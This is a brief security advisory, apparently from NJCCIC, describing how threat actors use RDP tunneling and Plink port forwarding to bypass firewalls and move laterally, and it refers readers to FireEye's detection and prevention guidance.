Threat Actors are Bypassing Network Protections via RDP Tunneling

A Microsoft Windows component, Remote Desktop Protocol (RDP), provides administrators and users with remote access to systems. Threat actors are bypassing network protections using RDP utilities, network tunneling and host-based port forwarding, by taking advantage of unprotected ports in the network’s firewall. Threat actors are using PuTTY Link, or Plink, for inbound RDP tunneling, allowing them to establish SSH network connections to other systems. Using these tactics, they can move laterally to segmented networks through an administrative jump box without disrupting legitimate administrators; making these intrusions and attacks difficult to detect. The NJCCIC recommends reviewing and applying the host-based and network-based prevention and detection mechanisms, which can be found on the FireEye blog post here.